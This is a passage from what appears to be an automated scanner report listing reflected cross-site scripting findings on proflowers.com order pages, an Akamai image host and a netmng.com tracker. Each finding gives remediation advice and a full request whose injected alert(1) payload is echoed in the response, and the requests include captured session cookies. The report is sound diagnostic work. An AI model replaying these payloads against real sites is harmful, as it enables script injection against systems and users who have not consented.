Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:30 GMT
Connection: close

Unable to find /ProvideCommerce/p0074868bb9a40<img src=a onerror=alert(1)>618e53e1f8f
4.166. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a461f<img%20src%3da%20onerror%3dalert(1)>5417133fe9d was submitted in the REST URL parameter 9. This input was echoed as a461f<img src=a onerror=alert(1)>5417133fe9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749ba461f<img%20src%3da%20onerror%3dalert(1)>5417133fe9d?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:30 GMT
Connection: close

Unable to find /ProvideCommerce/p0084749ba461f<img src=a onerror=alert(1)>5417133fe9d
4.167. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ebe78<img%20src%3da%20onerror%3dalert(1)>d7b15d166f5 was submitted in the REST URL parameter 9. This input was echoed as ebe78<img src=a onerror=alert(1)>d7b15d166f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tnebe78<img%20src%3da%20onerror%3dalert(1)>d7b15d166f5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 87
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:26 GMT
Connection: close

Unable to find /ProvideCommerce/palepink_tnebe78<img src=a onerror=alert(1)>d7b15d166f5
4.168. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e946f<img%20src%3da%20onerror%3dalert(1)>871e3e70b86 was submitted in the REST URL parameter 9. This input was echoed as e946f<img src=a onerror=alert(1)>871e3e70b86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tne946f<img%20src%3da%20onerror%3dalert(1)>871e3e70b86?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:29 GMT
Connection: close

Unable to find /ProvideCommerce/summerchocolates08_tne946f<img src=a onerror=alert(1)>871e3e70b86
4.169. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload caf6c<img%20src%3da%20onerror%3dalert(1)>ef775a487ff was submitted in the REST URL parameter 9. This input was echoed as caf6c<img src=a onerror=alert(1)>ef775a487ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tncaf6c<img%20src%3da%20onerror%3dalert(1)>ef775a487ff?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:18:55 GMT
Connection: close

Unable to find /ProvideCommerce/zinc08_tncaf6c<img src=a onerror=alert(1)>ef775a487ff
4.170. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b464'%3balert(1)//95044cf71dc was submitted in the u parameter. This input was echoed as 8b464';alert(1)//95044cf71dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u=8b464'%3balert(1)//95044cf71dc HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CMEacUnu%2BdlVAnlb0EJqADUPwdEWLwFVt1YkusdXa%2FyG4PDMmwT%2Bp04eahs%2BgOi%2BCY9F8sJ1N5rP7C5Tcb6%2BH1tPYzqeBSrsgO%2FIVnhaSvpJm5%2FDT0Ajp8kznUSNzkVywo4QxpKsftt8R5jf0pDOjFkH3uJy8CgNSN5gRv3ZgKClRVzaPtdufl67Wm9PuOAAQRJYlAbyAfeEbfybOFvnJNK26bhsFqut4RfCugAAIH9Thyf7tC%2FaFjZR6%2F4Xe3KWE9CjAfOduuB6WLWUvJbSzsEWNZmsH81p0aGPaG8iWRByF0XMlYG51oqOMDXV2iLvcha3GW5DrzVhwxSGnknALfg%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1244
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split('/')[2]){
var url = '//dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=0&u=8b464';alert(1)//95044cf71dc';
var proto = window.location.protocol.toLowerCase();
if(proto=='https:') url = proto + url;
else url = 'http:' + url;
var now = new Date();
url += '&timecode=' + now.getTime();
if(sirefurl!=nul
...[SNIP]...
4.171. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc107\"%3balert(1)//ec98c73342e was submitted in the trackingpgroup parameter. This input was echoed as fc107\\";alert(1)//ec98c73342e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPCfc107\"%3balert(1)//ec98c73342e&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:27 GMT
Content-Length: 46950


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "HPCfc107\\";alert(1)//ec98c73342e"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...
4.172. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7636d\"%3balert(1)//578657e5ceb was submitted in the trackingpgroup parameter. This input was echoed as 7636d\\";alert(1)//578657e5ceb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_carousel&selectedrelationshipID=428685&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=HPC7636d\"%3balert(1)//578657e5ceb&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:24:55 GMT
Content-Length: 46950


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "HPC7636d\\";alert(1)//578657e5ceb"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...
4.173. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f840e\"%3balert(1)//9623d7271fc was submitted in the trackingpgroup parameter. This input was echoed as f840e\\";alert(1)//9623d7271fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

POST /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBSf840e\"%3balert(1)//9623d7271fc&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
Origin: https://orders.proflowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE
Content-Length: 8113

SERVERNAME=ORDER01&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JnBK5JoLsH11eKYPAAbCB9J4CE%2BfEs%2B2jrNxmtLrGIH7KjQenTcoo%2F%2BLYNTaHsT3d%2FkIMPksdO3qKV6sxrf%2ByMhJ20SJav0TObp85l31XC5kQm7gF3Y%2FXdlJicN
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:36:44 GMT
Content-Length: 50700


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBSf840e\\";alert(1)//9623d7271fc"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event6";

   if ("" != "") {
       events +
...[SNIP]...
4.174. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb909\"%3balert(1)//3c15789ae2e was submitted in the trackingpgroup parameter. This input was echoed as cb909\\";alert(1)//3c15789ae2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBScb909\"%3balert(1)//3c15789ae2e&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
